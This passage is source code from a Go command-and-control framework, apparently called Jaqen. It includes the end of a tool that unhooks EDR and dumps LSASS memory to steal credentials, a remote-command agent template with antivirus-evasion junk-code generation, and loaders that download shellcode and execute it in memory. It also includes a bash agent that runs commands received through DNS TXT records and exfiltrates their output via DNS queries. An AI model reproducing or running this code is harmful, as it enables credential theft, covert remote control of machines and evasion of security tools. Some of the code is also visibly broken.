119 | 		uintptr(tokenHandle),
120 | 		uintptr(0),
121 | 		uintptr(unsafe.Pointer(&privs)),
122 | 		ptr(0),
123 | 		ptr(0),
124 | 		ptr(0),
125 | 	)
126 | 	fmt.Println("adjust privs:", r, a, e)
127 | 	return false
128 | }
129 | 
130 | func getNTReadVirtualSyscall() byte {
131 | 	const (
132 | 		win8  = 0x060200
133 | 		win81 = 0x060300
134 | 		win10 = 0x0A0000
135 | 	)
136 | 	//                    7 and Pre-7     2012SP0   2012-R2    8.0     8.1    Windows 10+
137 | 	//NtReadVirtualMemory 0x003c 0x003c    0x003d   0x003e    0x003d 0x003e 0x003f 0x003f
138 | 
139 | 	syscall_id := byte(0x3f)
140 | 	//static auto RtlGetVersion = (RtlGetVersion_t)GetProcAddress(GetModuleHandle(TEXT("NTDLL")), "RtlGetVersion");
141 | 	procRtlGetVersion := syscall.NewLazyDLL("ntdll.dll").NewProc("RtlGetVersion")
142 | 	type osVersionInfoExW struct {
143 | 		dwOSVersionInfoSize uint32
144 | 		dwMajorVersion      uint32
145 | 		dwMinorVersion      uint32
146 | 		dwBuildNumber       uint32
147 | 		dwPlatformId        uint32
148 | 		szCSDVersion        [128]uint16
149 | 		wServicePackMajor   uint16
150 | 		wServicePackMinor   uint16
151 | 		wSuiteMask          uint16
152 | 		wProductType        uint8
153 | 		wReserved           uint8
154 | 	}
155 | 	var osvi osVersionInfoExW
156 | 	osvi.dwOSVersionInfoSize = uint32(unsafe.Sizeof(osvi))
157 | 	ret, _, err := procRtlGetVersion.Call(uintptr(unsafe.Pointer(&osvi)))
158 | 	if ret != 0 {
159 | 		panic("Can't get os version" + err.Error())
160 | 	}
161 | 	//auto osvi = OSVERSIONINFOEXW{ sizeof(OSVERSIONINFOEXW) };
162 | 
163 | 	//RtlGetVersion((POSVERSIONINFOW)&osvi);
164 | 
165 | 	version_long := (osvi.dwMajorVersion << 16) | (osvi.dwMinorVersion << 8) | uint32(osvi.wServicePackMajor)
166 | 	if version_long < win8 { //before win8
167 | 		syscall_id = 0x3c
168 | 	} else if version_long == win8 { //win8 and server 2008 sp0
169 | 		syscall_id = 0x3d
170 | 	} else if version_long == win81 { //win 8.1 and server 2008 r2
171 | 		syscall_id = 0x3e
172 | 	} else if version_long > win81 { //anything after win8.1
173 | 		syscall_id = 0x3f
174 | 	}
175 | 	return syscall_id
176 | }
177 | 
178 | func freeNtReadVirtualMemory() {
179 | 	sysval := getNTReadVirtualSyscall()
180 | 	//win64 original values, (todo: add 32bit, and use when in 32bit land)
181 | 	shellcode := []byte{
182 | 		0x4C, 0x8B, 0xD1, // mov r10, rcx; NtReadVirtualMemory
183 | 		0xB8, 0x3c, 0x00, 0x00, 0x00, // eax, 3ch
184 | 		0x0F, 0x05, // syscall
185 | 		0xC3, // retn
186 | 	}
187 | 	shellcode[4] = sysval
188 | 	kernel32 := syscall.NewLazyDLL("kernel32.dll")
189 | 	procWriteMem := kernel32.NewProc("WriteProcessMemory")
190 | 	ntdll := syscall.NewLazyDLL("ntdll.dll")
191 | 	rvm := ntdll.NewProc("NtReadVirtualMemory")
192 | 	NtReadVirtualMemory := rvm.Addr()
193 | 	thsHandle, _ := syscall.GetCurrentProcess()
194 | 	//WriteProcessMemory(GetCurrentProcess(), NtReadVirtualMemory, Shellcode, sizeof(Shellcode), NULL);
195 | 	r, a, e := procWriteMem.Call(
196 | 		uintptr(thsHandle),                     // this pid (HANDLE hprocess)
197 | 		NtReadVirtualMemory,                    // address of target? (LPVOID lpBaseAddress)
198 | 		uintptr(unsafe.Pointer(&shellcode[0])), // LPCVOID lpBuffer,
199 | 		uintptr(len(shellcode)),                // SIZE_T nSize,
200 | 		uintptr(0),                             // SIZE_T *numberofbytes written
201 | 	)
202 | 	fmt.Println("Unhooking:", r, a, e)
203 | 
204 | 	if r == 0 {
205 | 		panic("nooo")
206 | 	}
207 | }
208 | 
209 | func ptr(val interface{}) uintptr {
210 | 	switch val.(type) {
211 | 	case string:
212 | 		return uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(val.(string))))
213 | 	case int:
214 | 		return uintptr(val.(int))
215 | 	default:
216 | 		return uintptr(0)
217 | 	}
218 | }
219 | 
220 | //greetz to hoang and his andrewspecial post :)
221 | //https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
222 | func main() {
223 | 	pn := "lsass.exe"
224 | 	setPrivilege("SeDebugPrivilege", true)
225 | 	pid := getProcID(pn)
226 | 	fmt.Println("lsass pid:", pid)
227 | 	hProc, err := syscall.OpenProcess(0x1F0FFF, false, pid) //PROCESS_ALL_ACCESS := uint32(0x1F0FFF)
228 | 	if err != nil {
229 | 		panic(err)
230 | 	}
231 | 	fmt.Println("proc handle:", hProc)
232 | 	if hProc != 0 {
233 | 		freeNtReadVirtualMemory()
234 | 		minidump(int(pid), int(hProc))
235 | 	}
236 | }
237 | 


--------------------------------------------------------------------------------
/libJaqen/agent/agent.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | /*
  4 | an agent must:
  5 | 	*-send communications back to the server
  6 | 		checkin:
  7 | 			- optionally provide info like username, arch and computer name
  8 | 		response:
  9 | 			- command response/data
 10 | 
 11 | 	*-receive communications/commands from the server
 12 | 	-execute commands on the machine
 13 | 	-set global vars
 14 | 
 15 | This is a template - copy this out, and paste it into an isolated directory for development.
 16 | 
 17 | Write your code in the sections that are delimited with curly braces - always start your code with * / (without the space) and end it with /*
 18 | 
 19 | Provided the agent doesn't use any OS specific functions or code, this should enable the ability to generate agents for whichever arch is needed
 20 | 
 21 | */
 22 | 
 23 | import (
 24 | 	/*{{.Imports}}*/ //Don't forget any imports!!
 25 | 	"math/rand"
 26 | 
 27 | 	"os/exec"
 28 | 	"strings"
 29 | 	"time"
 30 | 	"unicode"
 31 | )
 32 | 
 33 | /*{{.GlobalVars}}*/
 34 | 
 35 | type agent struct {
 36 | 	uid       string
 37 | 	osType    string
 38 | 	settings  agentSettings
 39 | 	cmd       string
 40 | 	cmdID     string
 41 | 	cmdResult []byte
 42 | }
 43 | 
 44 | type agentSettings struct {
 45 | 	maplol map[string]string
 46 | }
 47 | 
 48 | func (as *agentSettings) Set(k, v string) {
 49 | 	as.maplol[k] = v
 50 | }
 51 | 
 52 | func (as *agentSettings) Get(k string) string {
 53 | 	return as.maplol[k]
 54 | }
 55 | 
 56 | func (a *agent) Checkin() {
 57 | 
 58 | 	tick := time.NewTicker(time.Second * 3)
 59 | 	for {
 60 | 		//timeout
 61 | 		select {
 62 | 		case <-tick.C:
 63 | 			/*{{.Checkin}}*/
 64 | 
 65 | 			tick.Stop()
 66 | 			randyboi := rand.Intn( {{.CheckinMaxTime}} ) //10 seconds variance
 67 | 			tick = time.NewTicker(time.Duration(randyboi) * time.Millisecond)
 68 | 		}
 69 | 
 70 | 	}
 71 | 
 72 | }
 73 | 
 74 | func (a *agent) Init() {
 75 | 	/*{{.Init}}*/
 76 | 
 77 | 	rand.Seed(time.Now().UnixNano()) //probably a bad idea, whatever
 78 | 	a.uid = RandStringRunes(10)
 79 | 	//*/
 80 | }
 81 | 
 82 | func (a *agent) GetCommand() bool {
 83 | 
 84 | 	/*{{.GetCommand}}*/
 85 | 	return false
 86 | 
 87 | }
 88 | 
 89 | func (a *agent) GetSetting(s string) string {
 90 | 	return a.settings.Get(s)
 91 | }
 92 | 
 93 | func (a *agent) SetSetting(k, v string) {
 94 | 	a.settings.Set(k, v)
 95 | }
 96 | 
 97 | func main() {
 98 | 	//create agent
 99 | 	a := agent{
100 | 		settings: agentSettings{
101 | 			maplol: make(map[string]string),
102 | 		},
103 | 	}
104 | 	a.Init()
105 | 	go a.Checkin()
106 | 	for {
107 | 		if a.GetCommand() {
108 | 			a.ExecCommand()
109 | 		}
110 | 		v := rand.Intn( {{.CmdExecTimeout}} )
111 | 		time.Sleep(time.Millisecond * time.Duration(v))
112 | 	}
113 | }
114 | 
115 | func cmmdFmt(s string) []string {
116 | 	lastQuote := rune(0)
117 | 	f := func(c rune) bool {
118 | 		switch {
119 | 		case c == lastQuote:
120 | 			lastQuote = rune(0)
121 | 			return false
122 | 		case lastQuote != rune(0):
123 | 			return false
124 | 		case unicode.In(c, unicode.Quotation_Mark):
125 | 			lastQuote = c
126 | 			return false
127 | 		default:
128 | 			return unicode.IsSpace(c)
129 | 
130 | 		}
131 | 	}
132 | 
133 | 	return strings.FieldsFunc(s, f)
134 | }
135 | 
136 | func (a *agent) ExecCommand() {
137 | 	/*{{.ExecCommand}}*/
138 | 
139 | 	//execute command in system
140 | 	// (This should work by default. Template is here to enable alternative execution methods incase AV catches on that smashing exec.Command is not a good sign etc.)
141 | 	c := a.cmd
142 | 	cmds := cmmdFmt(c)
143 | 	if len(cmds) < 1 {
144 | 		return
145 | 	}
146 | 	p := exec.Command(cmds[0], cmds[1:]...)
147 | 	result, e := p.Output()
148 | 
149 | 	if e != nil {
150 | 		result = []byte(e.Error())
151 | 	}
152 | 	a.SendResponse(result)
153 | 
154 | }
155 | 
156 | func (a *agent) SendResponse(b []byte) {
157 | 	/*{{.SendResponse}}*/
158 | 
159 | }
160 | 
161 | //dynamically generate and inject garbage routines into function calls to avoid AV fingerprinting too easily.
162 | //Usage: When initialising the AgentCode struct(x := AgentCode{}), call the AVoidance("") method (x.AVoidance(""))
163 | //The string provided will be added to the init function, so if you have your own AVoidance techniques you can inject them there.
164 | 
165 | /*{{.AVoidance}}*/
166 | 
167 | func RandStringRunes(n int) string {
168 | 	var letterRunes = []byte("abcdefghijklmnopqrstuvwxyz1234567890")
169 | 	b := make([]byte, n)
170 | 	for i := range b {
171 | 		b[i] = letterRunes[rand.Intn(len(letterRunes))]
172 | 	}
173 | 	return string(b)
174 | }
175 | 


--------------------------------------------------------------------------------
/libJaqen/agent/exec/shellcode.go:
--------------------------------------------------------------------------------
 1 | package exec
 2 | 
 3 | /*
 4 | int call(char *code) {
 5 |     int (*ret)() = (int(*)())code;
 6 | 	ret();
 7 | 	return 0;
 8 | }
 9 | */
10 | import "C"
11 | import (
12 | 	"bytes"
13 | 	"encoding/base64"
14 | 	"net/http"
15 | 	"time"
16 | 	"unsafe"
17 | 
18 | 	mmap "github.com/edsrzf/mmap-go"
19 | )
20 | 
21 | func GetShellcodeFromWeb(addr string) []byte {
22 | 
23 | 	//buf := ""
24 | 	r, e := http.Get(addr)
25 | 	if e != nil {
26 | 		panic(e)
27 | 	}
28 | 	defer r.Body.Close()
29 | 	buff := &bytes.Buffer{}
30 | 	buff.ReadFrom(r.Body)
31 | 	body := buff.Bytes()
32 | 	return body
33 | }
34 | 
35 | func ExecShellBytes(shellcode []byte) {
36 | 	b, e := mmap.MapRegion(nil, len(shellcode), mmap.EXEC|mmap.RDWR, mmap.ANON, int64(0))
37 | 	//b, e := syscall.Mmap(0, 0, len(shellcode), syscall.PROT_READ|syscall.PROT_WRITE|syscall.PROT_EXEC, syscall.MAP_ANON)
38 | 	if e != nil {
39 | 		//panic(e)
40 | 	}
41 | 	C.call((*C.char)(unsafe.Pointer(&b[0])))
42 | 
43 | 	time.Sleep(5)
44 | }
45 | 
46 | func ExecFromBase64(s string) error {
47 | 	b, e := base64.StdEncoding.DecodeString(s)
48 | 	if e != nil {
49 | 		return e
50 | 	}
51 | 	ExecShellBytes(b)
52 | 	return nil
53 | }
54 | 


--------------------------------------------------------------------------------
/libJaqen/agent/exec/shellcode_windows.go:
--------------------------------------------------------------------------------
 1 | package exec
 2 | 
 3 | import (
 4 | 	"syscall"
 5 | 	"unsafe"
 6 | )
 7 | 
 8 | const MEM_COMMIT = 0x1000
 9 | const MEM_RESERVE = 0x2000
10 | const PAGE_EXECUTE_READWRITE = 0x40
11 | const PROCESS_CREATE_THREAD = 0x0002
12 | const PROCESS_QUERY_INFORMATION = 0x0400
13 | const PROCESS_VM_OPERATION = 0x0008
14 | const PROCESS_VM_WRITE = 0x0020
15 | const PROCESS_VM_READ = 0x0010
16 | 
17 | func Execx86WinShellbytes(shellcode []byte) {
18 | 
19 | 	a, _, e := syscall.MustLoadDLL("kernel32.dll").MustFindProc("VirtualAlloc").Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
20 | 	if e != nil {
21 | 		//panic(e)
22 | 	}
23 | 
24 | 	//Todo:work out a way of mapping random amount of memory, as this is probably quite obvious
25 | 	ap := (*[99000]byte)(unsafe.Pointer(a))
26 | 	for i := 0; i < len(shellcode); i++ {
27 | 		(*ap)[i] = shellcode[i]
28 | 	}
29 | 	copy(b, shellcode)
30 | 	syscall.Syscall(a, 0, 0, 0, 0)
31 | }
32 | 


--------------------------------------------------------------------------------
/libJaqen/server/agentGeneration.go:
--------------------------------------------------------------------------------
  1 | package server
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"fmt"
  6 | 	"log"
  7 | 	"math/rand"
  8 | 	"os"
  9 | 	"os/exec"
 10 | 	"time"
 11 | )
 12 | 
 13 | //thx moloch--
 14 | var validCompilerTargets = map[string]bool{
 15 | 	"darwin/386":      true,
 16 | 	"darwin/amd64":    true,
 17 | 	"dragonfly/amd64": true,
 18 | 	"freebsd/386":     true,
 19 | 	"freebsd/amd64":   true,
 20 | 	"freebsd/arm":     true,
 21 | 	"linux/386":       true,
 22 | 	"linux/amd64":     true,
 23 | 	"linux/arm":       true,
 24 | 	"linux/arm64":     true,
 25 | 	"linux/ppc64":     true,
 26 | 	"linux/ppc64le":   true,
 27 | 	"linux/mips":      true,
 28 | 	"linux/mipsle":    true,
 29 | 	"linux/mips64":    true,
 30 | 	"linux/mips64le":  true,
 31 | 	"linux/s390x":     true,
 32 | 	"netbsd/386":      true,
 33 | 	"netbsd/amd64":    true,
 34 | 	"netbsd/arm":      true,
 35 | 	"openbsd/386":     true,
 36 | 	"openbsd/amd64":   true,
 37 | 	"openbsd/arm":     true,
 38 | 	"plan9/386":       true,
 39 | 	"plan9/amd64":     true,
 40 | 	"plan9/arm":       true,
 41 | 	"solaris/amd64":   true,
 42 | 	"windows/386":     true,
 43 | 	"windows/amd64":   true,
 44 | }
 45 | 
 46 | type GoConfig struct {
 47 | 	CGO     string
 48 | 	GOOS    string
 49 | 	GOARCH  string
 50 | 	GOROOT  string
 51 | 	GOPATH  string
 52 | 	LDFLAGS []string
 53 | }
 54 | 
 55 | func GetGoRoot() string {
 56 | 	return os.Getenv("GOROOT")
 57 | }
 58 | 
 59 | func GetGoPath() string {
 60 | 	return os.Getenv("GOPATH")
 61 | }
 62 | 
 63 | func GetValidTarget(os, arc string) bool {
 64 | 	target := fmt.Sprintf("%s/%s", os)
 65 | 	_, ok := validCompilerTargets[target]
 66 | 	return ok
 67 | }
 68 | 
 69 | func GoCmd(config GoConfig, cwd string, command []string) error {
 70 | 	target := fmt.Sprintf("%s/%s", config.GOOS, config.GOARCH)
 71 | 	if _, ok := validCompilerTargets[target]; !ok {
 72 | 		return fmt.Errorf(fmt.Sprintf("Invalid compiler target: %s", target))
 73 | 	}
 74 | 	ldf := "-w -s"
 75 | 	if config.GOOS == "windows" {
 76 | 		ldf += " -H windowsgui"
 77 | 	}
 78 | 	command = append(command, "-ldflags")
 79 | 	command = append(command, ldf)
 80 | 
 81 | 	command = append(command) //strip binary
 82 | 	fmt.Println("Executing: go", command)
 83 | 	cmd := exec.Command("go", command...)
 84 | 	cmd.Dir = cwd
 85 | 	cmd.Env = os.Environ()
 86 | 	cmd.Env = append(cmd.Env, []string{
 87 | 		fmt.Sprintf("CGO_ENABLED=%s", config.CGO),
 88 | 		fmt.Sprintf("GOOS=%s", config.GOOS),
 89 | 		fmt.Sprintf("GOARCH=%s", config.GOARCH),
 90 | 		fmt.Sprintf("GOROOT=%s", config.GOROOT),
 91 | 		fmt.Sprintf("GOPATH=%s", config.GOPATH),
 92 | 		fmt.Sprintf("PATH=%sbin", config.GOROOT),
 93 | 	}...)
 94 | 
 95 | 	var stdout bytes.Buffer
 96 | 	var stderr bytes.Buffer
 97 | 	cmd.Stdout = &stdout
 98 | 	cmd.Stderr = &stderr
 99 | 
100 | 	err := cmd.Run()
101 | 	if err != nil {
102 | 		log.Printf("--- stdout ---\n%s\n", stdout.String())
103 | 		log.Printf("--- stderr ---\n%s\n", stderr.String())
104 | 		log.Print(err)
105 | 	}
106 | 
107 | 	return err
108 | }
109 | 
110 | type AgentCode struct {
111 | 	Imports,
112 | 	GlobalVars,
113 | 	Checkin,
114 | 	Init,
115 | 	GetCommand,
116 | 	ExecCommand,
117 | 	SendResponse,
118 | 	CmdExecTimeout,
119 | 	CheckinMaxTime,
120 | 	AVoidance string
121 | }
122 | 
123 | func (ac *AgentCode) AVoid(s string) {
124 | 	//do the avoidance stuff and things
125 | 	rand.Seed(time.Now().UnixNano())
126 | 	stb = fmt.Sprintf(stbo,
127 | 		fmt.Sprintf("RandStringRunes(%d)", rand.Intn(100)),
128 | 		fmt.Sprintf("RandStringRunes(%d)", rand.Intn(100)),
129 | 		fmt.Sprintf("RandStringRunes(%d)", rand.Intn(100)),
130 | 		"len(s)/2",
131 | 		"len(s)-1",
132 | 	)
133 | 	stb2 = fmt.Sprintf(stbo2,
134 | 		fmt.Sprintf("RandStringRunes(%d)", rand.Intn(100)),
135 | 		fmt.Sprintf("RandStringRunes(%d)", rand.Intn(100)),
136 | 		fmt.Sprintf("RandStringRunes(%d)", rand.Intn(100)),
137 | 		"len(s)/2",
138 | 		"len(s)-1",
139 | 	)
140 | 	ac.GlobalVars = "*/\nvar x []byte\n/*" + ac.GlobalVars
141 | 	sleeper = fmt.Sprintf(sleepero, rand.Intn(30))
142 | 	bufsize := rand.Intn(10000) + 10
143 | 	fakemem = fmt.Sprintf(fakememo, rand.Intn(30), rand.Intn(10000), bufsize, rand.Intn(bufsize-5), rand.Intn(254))
144 | 	bufsize = rand.Intn(100) + 10
145 | 	smallmem = fmt.Sprintf(smallmemo, rand.Intn(30), rand.Intn(10000), bufsize, rand.Intn(bufsize-5), rand.Intn(254))
146 | 	ac.AVoidance = `*/` + stb + stb2 + sleeper + fakemem + hops + smallmem + `/*`
147 | 	//put sleep on init
148 | 	ac.Init = "*/" + "\nsleeper()\n" + "/*" + ac.Init
149 | 	//start a async random order thingo
150 | 	ac.Init = "*/" + fmt.Sprintf("go hop%d()\n", rand.Intn(9)) + "/*" + ac.Init
151 | 	for x := 0; x < rand.Intn(100); x++ {
152 | 		if rand.Intn(2) == 1 {
153 | 			ac.Checkin = "*/" + fmt.Sprintf("hop%d()\n", rand.Intn(9)) + "/*" + ac.Checkin
154 | 			if rand.Intn(2) == 1 {
155 | 				ac.Checkin = "*/" + fmt.Sprintf(`x=doStuff1(RandStringRunes(%d))
156 | 			if x != nil {
157 | 			}
158 | 			`, rand.Intn(10)) + "/*" + ac.Checkin
159 | 			}
160 | 		}
161 | 		if rand.Intn(2) == 1 {
162 | 			ac.Init = "*/" + fmt.Sprintf("hop%d()\n", rand.Intn(9)) + "/*" + ac.Init
163 | 			if rand.Intn(2) == 1 {
164 | 				ac.Init = "*/" + fmt.Sprintf(`x=doStuff2(RandStringRunes(%d))
165 | 			if x != nil {
166 | 			}
167 | 			`, rand.Intn(10)) + "/*" + ac.Init
168 | 			}
169 | 		}
170 | 		if rand.Intn(2) == 1 {
171 | 			ac.GetCommand = "*/" + fmt.Sprintf("hop%d()\n", rand.Intn(9)) + "/*" + ac.GetCommand
172 | 			if rand.Intn(2) == 1 {
173 | 				ac.GetCommand = "*/" + fmt.Sprintf(`x=doStuff1(RandStringRunes(%d))
174 | 			if x != nil {
175 | 			}
176 | 			`, rand.Intn(10)) + "/*" + ac.GetCommand
177 | 			}
178 | 		}
179 | 		if rand.Intn(2) == 1 {
180 | 			ac.ExecCommand = "*/" + fmt.Sprintf("hop%d()\n", rand.Intn(9)) + "/*" + ac.ExecCommand
181 | 		}
182 | 		if rand.Intn(2) == 1 {
183 | 			ac.ExecCommand = "*/" + fmt.Sprintf(`x=doStuff1(RandStringRunes(%d))
184 | 		if x != nil {
185 | 		}
186 | 		`, rand.Intn(10)) + "/*" + ac.ExecCommand
187 | 		}
188 | 
189 | 		if rand.Intn(2) == 1 {
190 | 			ac.SendResponse = "*/" + fmt.Sprintf("hop%d()\n", rand.Intn(9)) + "/*" + ac.SendResponse
191 | 		}
192 | 		if rand.Intn(2) == 1 {
193 | 			ac.SendResponse = "*/" + fmt.Sprintf(`x=doStuff1(RandStringRunes(%d))
194 | 		if x != nil {
195 | 		}
196 | 		`, rand.Intn(10)) + "/*" + ac.SendResponse
197 | 		}
198 | 	}
199 | 
200 | }
201 | 
202 | var stb = ``
203 | 
204 | const stbo = `
205 | func doStuff1(s string) []byte {
206 | 	s = %s + %s + %s
207 | 	s = s[%s:%s]
208 | 	allocateSmallmemory()
209 | 	hops[rand.Intn(len(hops))]()
210 | 	return []byte(s)
211 | }
212 | `
213 | 
214 | var stb2 = ``
215 | 
216 | const stbo2 = `
217 | func doStuff2(s string) []byte {
218 | 	s = %s + %s + %s
219 | 	s = s[%s:%s]
220 | 	allocateFakeMemory()
221 | 	hops[rand.Intn(len(hops))]()
222 | 	return []byte(s)
223 | }
224 | `
225 | 
226 | var sleeper = ``
227 | 
228 | const sleepero = `
229 | func sleeper(){
230 | 	time.Sleep(%d)
231 | }
232 | `
233 | 
234 | var smallmem = ``
235 | 
236 | const smallmemo = `
237 | func allocateSmallmemory()  { 
238 | 	for i := 0; i < %d; i++ {
239 | 	  var size int = %d+1
240 | 	  hops[rand.Intn(len(hops))]()
241 | 	  Buffer_1 := make([]byte, size)
242 | 	  Buffer_1[size-1] = 1
243 | 	  var Buffer_2 [%d]byte
244 | 	  Buffer_2[%d] = %d
245 | 	}
246 |   }
247 | `
248 | 
249 | //https://github.com/EgeBalci/EGESPLOIT/blob/master/BypassAV.go
250 | var fakemem = ``
251 | 
252 | const fakememo = `
253 | func allocateFakeMemory()  { 
254 | 	for i := 0; i < %d; i++ {
255 | 	  var size int = %d+1
256 | 	  hops[rand.Intn(len(hops))]()
257 | 	  Buffer_1 := make([]byte, size)
258 | 	  Buffer_1[size-1] = 1
259 | 	  var Buffer_2 [%d]byte
260 | 	  Buffer_2[%d] = %d
261 | 	}
262 |   }
263 | `
264 | 
265 | const hops = `
266 | var hops []func() = []func(){
267 | 	hop0,
268 | 	hop1,
269 | 	hop2,
270 | 	hop3,
271 | 	hop4,
272 | 	hop5,
273 | 	hop6,
274 | 	hop7,
275 | 	hop8,
276 | 	hop9,
277 | 	hop10,
278 | }
279 | var magicNumber int64 = 0
280 | func hop0() {
281 | 	magicNumber++
282 | 	hop1()
283 | }
284 | func hop1() {
285 | 	magicNumber++
286 | 	hop2()
287 |   }
288 |   func hop2() {
289 | 	magicNumber++
290 | 	hop3()
291 |   }
292 |   func hop3() {
293 | 	magicNumber++
294 | 	hop4()
295 |   }
296 |   func hop4() {
297 | 	magicNumber++
298 | 	hop5()
299 |   }
300 |   func hop5() {
301 | 	magicNumber++
302 | 	hop6()
303 |   }
304 |   func hop6() {
305 | 	magicNumber++
306 | 	hop7()
307 |   }
308 |   func hop7() {
309 | 	magicNumber++
310 | 	hop8()
311 |   }
312 |   func hop8() {
313 | 	magicNumber++
314 | 	hop9()
315 |   }
316 |   func hop9() {
317 | 	magicNumber++
318 | 	hop10()
319 |   }
320 |   func hop10() {
321 | 	magicNumber++
322 |   }
323 |   `
324 | 


--------------------------------------------------------------------------------
/libJaqen/server/interface.go:
--------------------------------------------------------------------------------
  1 | package server
  2 | 
  3 | import (
  4 | 	"go/build"
  5 | 	"sync"
  6 | 	"time"
  7 | )
  8 | 
  9 | type Listener interface {
 10 | 	//general
 11 | 	//GetName will return the listeners 'name'. This will act as a prefix for the CLI if multiple listeners are defined.
 12 | 	GetName() string
 13 | 	//GetInfo will return the listener 'info' object. The 'info' Object should represent a high level of the current state of the listener (running state, options, name etc)
 14 | 	GetInfo() ListenerInfo
 15 | 
 16 | 	//options
 17 | 	//SetOption will set the specified option.
 18 | 	SetOption(string, string)
 19 | 	//GetOption will return the specified option, or an error if the option does not exist.
 20 | 	GetOption(string) (string, error)
 21 | 	//GetOptions will return all valid options for the listener.
 22 | 	GetOptions() func(string) []string
 23 | 
 24 | 	//agent stuff
 25 | 	//Kill will send a 'kill' message to the agent.
 26 | 	Kill(string)
 27 | 	//SendCommand will send the specified agent a command.
 28 | 	SendCommand(string, string)
 29 | 	//GenerateAgentFormats returns a slice of agent formats that can be generated.
 30 | 	GenerateAgentFormats() []string
 31 | 	//Generate will generate an agent of the specified format.
 32 | 	Generate(string) []byte
 33 | 
 34 | 	//runstate
 35 | 	//Init should initialise zero values of the listener, and return the signal channels required to interact with the listener
 36 | 	Init() (SignalChans, error)
 37 | 	//Start will start the listener
 38 | 	Start() error
 39 | 	//Stop will stop the listener (but not kill any agents).
 40 | 	Stop()
 41 | }
 42 | 
 43 | //Checkin defins the potential information that can be sent by agents to a checkin channel
 44 | type Checkin struct {
 45 | 	UID          string
 46 | 	ListenerName string
 47 | 	AgentOS      string
 48 | 	AgentType    string
 49 | 	AgentArch    string
 50 | 	CheckinTime  time.Time
 51 | }
 52 | 
 53 | //ListenerOptions is a concurrency safe map implementation, suitible for storing listener options
 54 | type ListenerOptions struct {
 55 | 	options   map[string]string
 56 | 	muOptions *sync.RWMutex
 57 | }
 58 | 
 59 | //New will return an empty initialised Listeneroptions object
 60 | func (l ListenerOptions) New() ListenerOptions {
 61 | 	r := ListenerOptions{
 62 | 		options:   make(map[string]string),
 63 | 		muOptions: &sync.RWMutex{},
 64 | 	}
 65 | 	//defaults for all agents
 66 | 	r.options["checkintime"] = "1000"
 67 | 	r.options["exectime"] = "1000"
 68 | 	r.options["cgo"] = "0"
 69 | 	r.options["goos"] = build.Default.GOOS // os.Getenv("GOOS")
 70 | 	r.options["goarch"] = build.Default.GOARCH
 71 | 	r.options["goroot"] = build.Default.GOROOT
 72 | 	r.options["gopath"] = build.Default.GOPATH
 73 | 	r.options["outfile"] = ""
 74 | 
 75 | 	return r
 76 | }
 77 | 
 78 | //Set will set the value
 79 | func (l *ListenerOptions) Set(key, value string) {
 80 | 	l.muOptions.Lock()
 81 | 	defer l.muOptions.Unlock()
 82 | 	l.options[key] = value
 83 | }
 84 | 
 85 | //Get returns the option value and 'true' if it exists, or an empty string and 'false' if it does not.
 86 | func (l *ListenerOptions) Get(k string) (string, bool) {
 87 | 	l.muOptions.RLock()
 88 | 	defer l.muOptions.RUnlock()
 89 | 	if v, ok := l.options[k]; ok {
 90 | 		return v, true
 91 | 	}
 92 | 	return "", false
 93 | }
 94 | 
 95 | //GetKeys returns a function that returns a slice of strings representing all options for the listener
 96 | func (l *ListenerOptions) GetKeys() func(string) []string {
 97 | 	l.muOptions.RLock()
 98 | 	defer l.muOptions.RUnlock()
 99 | 	return func(line string) []string {
100 | 		a := make([]string, 0)
101 | 		for k := range l.options { //other options go here?
102 | 			a = append(a, k)
103 | 		}
104 | 		return a
105 | 	}
106 | }
107 | 
108 | //CloneMap returns the options map defined internally (deep copy)
109 | func (l *ListenerOptions) CloneMap() map[string]string {
110 | 	l.muOptions.RLock()
111 | 	defer l.muOptions.RUnlock()
112 | 	r := make(map[string]string)
113 | 	for x := range l.options {
114 | 		r[x] = l.options[x]
115 | 	}
116 | 	return r
117 | }
118 | 
119 | //SignalChans contains the signal channels required in order to communicate with the listener.
120 | type SignalChans struct {
121 | 	CheckinChan  chan Checkin
122 | 	ResponseChan chan Command
123 | }
124 | 
125 | //ListenerInfo contains the running state of the listener.
126 | type ListenerInfo struct {
127 | 	Name    string
128 | 	Running bool
129 | 	Options map[string]string
130 | }
131 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/dnsListener/bashdnsagent.sh:
--------------------------------------------------------------------------------
1 | url="{{.Domain}}";uid=$(cat /dev/urandom|tr -dc 'a-zA-Z0-9'|fold -w 8|head -n 1);function execDNS { cmd=$1;cmdid=$2;c=$($cmd 2>&1);s=$(echo -n "$c"|xxd -ps -c 200|tr -d "\n");l=${#s};spl={{.Split}};rep=$(($l/$spl));rem=$(($l%$spl));repr=$rep;if [ $rem -gt 0 ];then repr=$(($repr + 1));fi;for i in `seq 0 $rep`;do z=$(($i*$spl));str=${s:z:spl};durl=$str"."$(($i+1))"."$repr"."$cmdid"."$uid"."$url;dig a $durl>/dev/null 2>&1;done;}; while true;do checkin=$uid"."$url;dig a $checkin>/dev/null 2>&1;cid=$(cat /dev/urandom|tr -dc 'a-zA-Z0-9'|fold -w 5|head -n 1);sleep 5;u=$cid"."$uid"."$url;txt=$(dig +answer +short txt $u);txt="${txt%\"}";txt="${txt#\"}";if [[ $txt == "NoCMD" ]];then continue;fi;execDNS "$txt" $cid&done&


--------------------------------------------------------------------------------
/libJaqen/server/listeners/dnsListener/dns.go:
--------------------------------------------------------------------------------
  1 | package dnsListener
  2 | 
  3 | import (
  4 | 	"errors"
  5 | 	"fmt"
  6 | 	"go/build"
  7 | 	"net"
  8 | 	"strings"
  9 | 	"sync"
 10 | 	"time"
 11 | 
 12 | 	"github.com/miekg/dns"
 13 | 
 14 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 15 | )
 16 | 
 17 | var cm dnscommandManager
 18 | 
 19 | type JaqenDNSListener struct {
 20 | 	running         bool
 21 | 	options         map[string]string
 22 | 	optionsMut      *sync.RWMutex
 23 | 	dnsCheckinChan  chan dnsresponse
 24 | 	dnsResponseChan chan dnsresponse
 25 | 	closeChan       chan struct{}
 26 | 	CheckinChan     chan server.Checkin
 27 | 	ResponseChan    chan server.Command
 28 | 	pendingCommands map[string][]string
 29 | 	pcMut           *sync.RWMutex
 30 | 	server          *dns.Server
 31 | }
 32 | 
 33 | func (d JaqenDNSListener) GetName() string {
